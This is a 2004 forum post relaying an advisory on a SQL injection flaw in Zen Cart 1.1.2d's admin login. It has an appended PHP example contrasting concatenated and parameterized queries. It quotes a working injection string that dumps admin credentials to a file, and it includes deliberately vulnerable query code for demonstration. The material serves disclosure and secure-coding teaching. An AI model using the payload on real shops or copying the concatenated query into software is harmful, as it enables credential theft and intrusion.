Zen Cart Bug
qcred11
May 18 2004, 05:56 PM
QUOTE
Zen Cart - The art of E-Commerce
Version 1.1.2d
Found by: ruggine
1. Problem
2. Solution
3. Info
1. A remote user can inject SQL commands.
-----------
The bug is in the /admin/login.php file:
let's see the code:
if (isset($_POST['submit'])) {
    $admin_name = zen_db_prepare_input($_POST['admin_name']);
    $admin_pass = zen_db_prepare_input($_POST['admin_pass']);
    // The user-supplied $admin_name is concatenated directly into the SQL string.
    $sql = "select admin_id, admin_name, admin_pass from " . TABLE_ADMIN . " where admin_name = '" . $admin_name . "'";
    $result = $db->Execute($sql);
    // ... rest of the login handling is not shown in the advisory
}
It's possible to inject in $_POST['admin_name'] (for example) something
like this: ' or ''='' into outfile 'sample.txt
So it's possible to write a file with users and passwords.
-----------
2.
3. Vendor URL:
http://www.zen-cart.com
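
The query pattern from the advisory next to a parameterized version, as an added example that is not part of the original post and is not Zen Cart's code. It uses PHP's PDO with an in-memory SQLite database; the table contents, the function names and the hashed password storage are assumptions made for the illustration.

```php
<?php
// Added example, not Zen Cart code. Column names follow the advisory's query;
// the in-memory SQLite database and its single row are constructed.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE admin (admin_id INTEGER PRIMARY KEY, admin_name TEXT, admin_pass TEXT)');
$ins = $pdo->prepare('INSERT INTO admin (admin_name, admin_pass) VALUES (?, ?)');
$ins->execute(['alice', password_hash('constructed-password', PASSWORD_DEFAULT)]);

// Before: the pattern from the advisory, input concatenated into the SQL text.
function find_admin_concat(PDO $pdo, string $name): array {
    $sql = "select admin_id, admin_name, admin_pass from admin where admin_name = '" . $name . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// After: the name is bound as a parameter, so the database only ever
// compares it as a value and never parses it as SQL.
function find_admin_bound(PDO $pdo, string $name): array {
    $stmt = $pdo->prepare('select admin_id, admin_name, admin_pass from admin where admin_name = ?');
    $stmt->execute([$name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Login check built on the bound lookup: exactly one row must match the name,
// and the password is verified in PHP against the stored hash.
function login(PDO $pdo, string $name, string $pass): bool {
    $rows = find_admin_bound($pdo, $name);
    return count($rows) === 1 && password_verify($pass, $rows[0]['admin_pass']);
}

// The quote-breaking start of the string quoted in the advisory.
$input = "' or ''='";
printf("concatenated lookup: %d row(s)\n", count(find_admin_concat($pdo, $input)));
printf("bound lookup:        %d row(s)\n", count(find_admin_bound($pdo, $input)));
var_dump(login($pdo, 'alice', 'constructed-password'));
var_dump(login($pdo, $input, 'x'));
```

Comparing the two row counts shows whether the input changed the WHERE clause or was matched as a literal admin name.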